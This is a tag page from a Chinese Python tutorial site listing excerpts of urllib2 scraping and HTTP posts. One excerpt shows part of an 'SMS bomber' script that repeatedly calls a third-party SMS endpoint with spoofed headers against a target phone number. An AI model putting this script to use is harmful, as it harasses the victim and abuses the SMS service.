urllib2 | 易学教程

Multipart form encoding and posting with urllib3

阅读更多关于 Multipart form encoding and posting with urllib3

问题 I'm attempting to upload a csv file to this site. However, I've encountered a few issues, and I think it stems from the incorrect mimetype (maybe). I'm attempting to manually post the file via urllib2 , so my code looks as follows: import urllib import urllib2 import mimetools, mimetypes import os, stat from cStringIO import StringIO #============================ # Note: I found this recipe online. I can't remember where exactly though.. #============================= class Callable: def _

Python 3 urllib Vs requests performance

阅读更多关于 Python 3 urllib Vs requests performance

问题 I'm using python 3.5 and I'm checking the performance of urllib module Vs requests module. I wrote two clients in python the first one is using the urllib module and the second one is using the request module. they both generate a binary data, which I send to a server which is based on flask and from the flask server I also return a binary data to the client. I found that time took to send the data from the client to the server took same time for both modules (urllib, requests) but the time

counting words inside a webpage

阅读更多关于 counting words inside a webpage

问题 I need to count words that are inside a webpage using python3. Which module should I use? urllib? Here is my Code: def web(): f =("urllib.request.urlopen("https://americancivilwar.com/north/lincoln.html") lu = f.read() print(lu) 回答1: With below self explained code you can get a good starting point for counting words within a web page: import requests from bs4 import BeautifulSoup from collections import Counter from string import punctuation # We get the url r = requests.get("https://en

python中模拟浏览器抓取网页（-）

阅读更多关于 python中模拟浏览器抓取网页（-）

对于平时我们抓取网页的内容时，比较倾向于直接利用urllib进行抓取（这里我就基于python的2.7版本进行解说，对于python3之后的版本，是将python中的urllib和urllib2和并成了urllib），但有些网站设置了防采集的功能，会拒绝爬虫进行数据的采集，这时候便可以模拟浏览器进行网页访问，然后抓取需要的数据。下面是一个简单的访问： import urllib url="http://www.csdn.net/" html=urllib.urlopen(url) print html.read() 使用上面的程序，将会访问到csdn网站的首页并将显示此网页的源码。我们再来看下面的例子： import urllib url="http://blog.csdn.net/beliefer/article/details/51251757" html=urllib.urlopen(url) print html.read() 在此例子中，我将网址改变了，改成访问csdn中的博客，此时便出现了下面的结果： <html> <head><title>403 Forbidden</title></head> <body bgcolor="white"> <center><h1>403 Forbidden</h1></center> <hr><center>nginx<

运用cookie登陆人人网爬取数据

阅读更多关于运用cookie登陆人人网爬取数据

　　浏览器访问WEB服务器的过程在用户访问网页时，不论是通过URL输入域名或IP，还是点击链接，浏览器向WEB服务器发出了一个HTTP请求（Http Request），WEB服务器接收到客户端浏览器的请求之后，响应客户端的请求，发回相应的响应信息（Http Response），浏览器解析引擎，排版引擎分析返回的内容，呈现给用户。WEB应用程序在于服务器交互的过程中，HTTP请求和响应时发送的都是一个消息结构　　什么是cookie cookie在http请求和http响应的头信息中，cookie是消息头的一种很重要的属性. 当用户通过浏览器首次访问一个域名时，访问的WEB服务器会给客户端发送数据，以保持WEB服务器与客户端之间的状态保持，这些数据就是Cookie，它是 Internet 站点创建的 ,为了辨别用户身份而储存在用户本地终端上的数据，Cookie中的信息一般都是经过加密的，Cookie存在缓存中或者硬盘中，在硬盘中的是一些小文本文件,当你访问该网站时，就会读取对应网站的Cookie信息，Cookie有效地提升了我们的上网体验。一般而言，一旦将 Cookie 保存在计算机上，则只有创建该 Cookie 的网站才能读取它。　　为什么需要cookie Http协议是一个无状态的面向连接的协议，Http协议是基于tcp/ip协议层之上的协议

爬虫urllib2库的基本使用

阅读更多关于爬虫urllib2库的基本使用

所谓网页抓取，就是把URL地址中指定的网络资源从网络流中读取出来，保存到本地。在Python中有很多库可以用来抓取网页， urllib2库基本使用。 urllib2 是 Python2.7 自带的模块(不需要下载，导入即可使用) urllib2 官方文档： https://docs.python.org/2/library/urllib2.html urllib2 源码： https://hg.python.org/cpython/file/2.7/Lib/urllib2.py urllib2 在 python3.x 中被改为 urllib.request urlopen #coding=utf-8 # 导入urllib2 库 import urllib2 # 向指定的url发送请求，并返回服务器响应的类文件对象 response = urllib2.urlopen("http://www.cnblogs.com/loaderman/") # 类文件对象支持文件对象的操作方法，如read()方法读取文件全部内容，返回字符串 html = response.read() # 打印字符串 print html 执行写的python代码，将打印结果实际上，查看网页右键选择“查看源代码”，会发现，和打印出来的是一模一样。也就是说，上面的4行代码就已经帮我们网页的全部代码爬了下来。

Python爬虫(二)_urllib2的使用

阅读更多关于 Python爬虫(二)_urllib2的使用

所谓网页抓取，就是把URL地址中指定的网络资源从网络流中读取出来，保存到本地。在Python中有很多库可以用来抓取网页，我们先学习 urllib2 。 urllib2是Python2.x自带的模块(不需要下载，导入即可使用) urllib2官网文档： https://docs.python.org/2/library/urllib2.html urllib2源码 urllib2 在python3.x中被改为 urllib.request urlopen 我们先来段代码： #-*- coding:utf-8 -*- #01.urllib2_urlopen.py #导入urllib2库 import urllib2 #向指定的url发送请求，并返回服务器的类文件对象 response = urllib2.urlopen("http://www.baidu.com") #类文件对象支持文件对象的操作方法，如read()方法读取文件 html = response.read() #打印字符串 print(html) 执行写好的python代码，将打印结果： python2 01.urllib2_urlopen.py 实际上，如果我们在浏览器打上百度主页，右键选择"查看源代码"，你会发现，跟我们刚才打印出来的是一模一样的。也就是说，上面的4行代码就已经帮我们把百度的首页的全部代码爬了下来。

python版的短信轰炸机smsbomb----------下篇（get）

阅读更多关于 python版的短信轰炸机smsbomb----------下篇（get）

在上一篇介绍的是post方式发送数据，可是有点站点是get方式发送数据，比如：http://www.oupeng.com/download，事实上方法差点儿相同。 import httplib,urllib,sys,os,re,urllib2 import string def attack(phone): datas="" url='http://www.oupeng.com/sms/sendsms.php?os=s60&mobile=%s' % phone i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5", "Accept": "text/plain",'Referer':'http://www.oupeng.com/download'} #payload=urllib.urlencode(payload) try: request=urllib2.Request(url=url,headers=i_headers) response=urllib2.urlopen(request) datas=response.read() print datas print 'attack success!!!'

Python网页抓取urllib,urllib2,httplib

阅读更多关于 Python网页抓取urllib,urllib2,httplib

前阶段使用到ftp，写了个工具脚本 http://blog.csdn.net/wklken/article/details/7059423 最近需要抓网页，看了下 Python 抓取方式需求：抓取网页，解析获取内容涉及库：【重点urllib2】 urllib http://docs.python.org/library/urllib.html urllib2 http://docs.python.org/library/urllib2.html httplib http://docs.python.org/library/httplib.html 使用urllib: 1. 抓取网页信息 urllib.urlopen(url[, data[, proxies]]) : url: 表示远程数据的路径 data: 以post方式提交到url的数据 proxies:用于设置代理 urlopen返回对象提供方法： - read() , readline() ,readlines() , fileno() , close() ：这些方法的使用方式与文件对象完全一样 - info()：返回一个httplib.HTTPMessage对象，表示远程服务器返回的头信息 - getcode()：返回Http状态码。如果是http请求，200请求成功完成;404网址未找到 - geturl()

urllib2 的使用细节（转）

阅读更多关于 urllib2 的使用细节（转）

Python 标准库中有很多实用的工具类，但是在具体使用时，标准库文档上对使用细节描述的并不清楚，比如 urllib2 这个 HTTP 客户端库。这里总结了一些 urllib2 库的使用细节。 1 Proxy 的设置 2 Timeout 设置 3 在 HTTP Request 中加入特定的 Header 4 Redirect 5 Cookie 6 使用 HTTP 的 PUT 和 DELETE 方法 7 得到 HTTP 的返回码 8 Debug Log 1 Proxy 的设置 urllib2 默认会使用环境变量 http_proxy 来设置 HTTP Proxy。如果想在程序中明确控制 Proxy，而不受环境变量的影响，可以使用下面的方式 import urllib2 enable_proxy = True proxy_handler = urllib2.ProxyHandler({"http" : 'http://some-proxy.com:8080'}) null_proxy_handler = urllib2.ProxyHandler({}) if enable_proxy: opener = urllib2.build_opener(proxy_handler) else: opener = urllib2.build_opener(null_proxy_handler)

订阅 urllib2